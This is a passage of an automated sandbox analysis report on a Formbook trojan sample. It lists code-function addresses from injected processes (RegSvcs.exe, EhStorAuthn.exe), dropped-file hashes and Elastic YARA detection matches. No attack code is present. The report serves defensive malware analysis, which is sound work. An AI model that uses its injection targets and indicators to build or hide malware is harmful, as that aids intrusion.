            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042E99315_2_0042E993
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040FBCB15_2_0040FBCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040FBD315_2_0040FBD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0041654015_2_00416540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0041654315_2_00416543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040FDF315_2_0040FDF3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040DE6915_2_0040DE69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040DE7315_2_0040DE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0147815815_2_01478158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E010015_2_013E0100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A11815_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A81CC15_2_014A81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B01AA15_2_014B01AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A41A215_2_014A41A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148200015_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AA35215_2_014AA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B03E615_2_014B03E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F015_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149027415_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014702C015_2_014702C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F053515_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B059115_2_014B0591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A244615_2_014A2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149442015_2_01494420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149E4F615_2_0149E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141475015_2_01414750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F077015_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EC7C015_2_013EC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140C6E015_2_0140C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140696215_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A015_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014BA9A615_2_014BA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FA84015_2_013FA840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F284015_2_013F2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D68B815_2_013D68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E8F015_2_0141E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AAB4015_2_014AAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A6BD715_2_014A6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EEA8015_2_013EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FAD0015_2_013FAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148CD1F15_2_0148CD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EADE015_2_013EADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01408DBF15_2_01408DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0C0015_2_013F0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0CF215_2_013E0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490CB515_2_01490CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01464F4015_2_01464F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01432F2815_2_01432F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01410F3015_2_01410F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01492F3015_2_01492F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FCFE015_2_013FCFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146EFA015_2_0146EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E2FC815_2_013E2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0E5915_2_013F0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AEE2615_2_014AEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AEEDB15_2_014AEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402E9015_2_01402E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014ACE9315_2_014ACE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014BB16B15_2_014BB16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142516C15_2_0142516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DF17215_2_013DF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FB1B015_2_013FB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149F0CC15_2_0149F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A70E915_2_014A70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AF0E015_2_014AF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F70C015_2_013F70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A132D15_2_014A132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DD34C15_2_013DD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0143739A15_2_0143739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140B2C015_2_0140B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F52A015_2_013F52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014912ED15_2_014912ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A757115_2_014A7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B95C315_2_014B95C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148D5B015_2_0148D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E146015_2_013E1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AF43F15_2_014AF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AF7B015_2_014AF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0143563015_2_01435630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A16CC15_2_014A16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140B95015_2_0140B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148591015_2_01485910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F995015_2_013F9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145D80015_2_0145D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F38E015_2_013F38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AFB7615_2_014AFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01465BF015_2_01465BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142DBF915_2_0142DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140FB8015_2_0140FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AFA4915_2_014AFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A7A4615_2_014A7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01463A6C15_2_01463A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149DAC615_2_0149DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01435AA015_2_01435AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148DAAC15_2_0148DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01491AA315_2_01491AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A1D5A15_2_014A1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A7D7315_2_014A7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F3D4015_2_013F3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140FDC015_2_0140FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01469C3215_2_01469C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AFCF215_2_014AFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AFF0915_2_014AFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F1F9215_2_013F1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013B3FD215_2_013B3FD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013B3FD515_2_013B3FD5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AFFB115_2_014AFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F9EB015_2_013F9EB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469244622_2_04692446
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468442022_2_04684420
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468E4F622_2_0468E4F6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E053522_2_045E0535
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046A059122_2_046A0591
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FC6E022_2_045FC6E0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E077022_2_045E0770
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0460475022_2_04604750
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045DC7C022_2_045DC7C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467200022_2_04672000
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0466815822_2_04668158
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045D010022_2_045D0100
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467A11822_2_0467A118
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046981CC22_2_046981CC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046A01AA22_2_046A01AA
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046941A222_2_046941A2
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468027422_2_04680274
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046602C022_2_046602C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469A35222_2_0469A352
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046A03E622_2_046A03E6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045EE3F022_2_045EE3F0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E0C0022_2_045E0C00
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045D0CF222_2_045D0CF2
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04680CB522_2_04680CB5
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045EAD0022_2_045EAD00
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467CD1F22_2_0467CD1F
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045DADE022_2_045DADE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045F8DBF22_2_045F8DBF
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E0E5922_2_045E0E59
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469EE2622_2_0469EE26
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469EEDB22_2_0469EEDB
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045F2E9022_2_045F2E90
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469CE9322_2_0469CE93
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04654F4022_2_04654F40
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04622F2822_2_04622F28
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04600F3022_2_04600F30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04682F3022_2_04682F30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045D2FC822_2_045D2FC8
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045ECFE022_2_045ECFE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0465EFA022_2_0465EFA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E284022_2_045E2840
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045EA84022_2_045EA840
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0460E8F022_2_0460E8F0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045C68B822_2_045C68B8
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045F696222_2_045F6962
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046AA9A622_2_046AA9A6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E29A022_2_045E29A0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045DEA8022_2_045DEA80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469AB4022_2_0469AB40
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04696BD722_2_04696BD7
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045D146022_2_045D1460
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469F43F22_2_0469F43F
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469757122_2_04697571
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046A95C322_2_046A95C3
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467D5B022_2_0467D5B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0462563022_2_04625630
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046916CC22_2_046916CC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469F7B022_2_0469F7B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046970E922_2_046970E9
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469F0E022_2_0469F0E0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E70C022_2_045E70C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468F0CC22_2_0468F0CC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046AB16B22_2_046AB16B
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0461516C22_2_0461516C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045CF17222_2_045CF172
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045EB1B022_2_045EB1B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046812ED22_2_046812ED
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FB2C022_2_045FB2C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E52A022_2_045E52A0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045CD34C22_2_045CD34C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469132D22_2_0469132D
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0462739A22_2_0462739A
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04659C3222_2_04659C32
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FCF222_2_0469FCF2
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04697D7322_2_04697D73
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E3D4022_2_045E3D40
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04691D5A22_2_04691D5A
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FFDC022_2_045FFDC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E9EB022_2_045E9EB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FF0922_2_0469FF09
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045A3FD222_2_045A3FD2
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045A3FD522_2_045A3FD5
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E1F9222_2_045E1F92
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FFB122_2_0469FFB1
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0464D80022_2_0464D800
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E38E022_2_045E38E0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E995022_2_045E9950
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FB95022_2_045FB950
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467591022_2_04675910
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04653A6C22_2_04653A6C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FA4922_2_0469FA49
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04697A4622_2_04697A46
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468DAC622_2_0468DAC6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04625AA022_2_04625AA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467DAAC22_2_0467DAAC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04681AA322_2_04681AA3
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FB7622_2_0469FB76
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04655BF022_2_04655BF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0461DBF922_2_0461DBF9
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FFB8022_2_045FFB80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F192022_2_022F1920
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022ECA6022_2_022ECA60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EAAE022_2_022EAAE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EAAD622_2_022EAAD6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EC83822_2_022EC838
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EC84022_2_022EC840
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F4FD022_2_022F4FD0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F31AD22_2_022F31AD
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F31B022_2_022F31B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0230B60022_2_0230B600
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433E4D322_2_0433E4D3
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433E3B822_2_0433E3B8
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433E86C22_2_0433E86C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433D8D822_2_0433D8D8
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: String function: 00D80DC0 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: String function: 00D7FD60 appears 40 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01425130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0146F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01437E54 appears 111 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 013DB970 appears 280 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0145EA12 appears 86 times
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: String function: 00E857A5 appears 34 times
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: String function: 00E86630 appears 31 times
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: String function: 00E857D8 appears 67 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 0465F290 appears 105 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 04627E54 appears 111 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 045CB970 appears 280 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 0464EA12 appears 86 times
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 04615130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs FS04dlvJrq.exe
            Source: FS04dlvJrq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
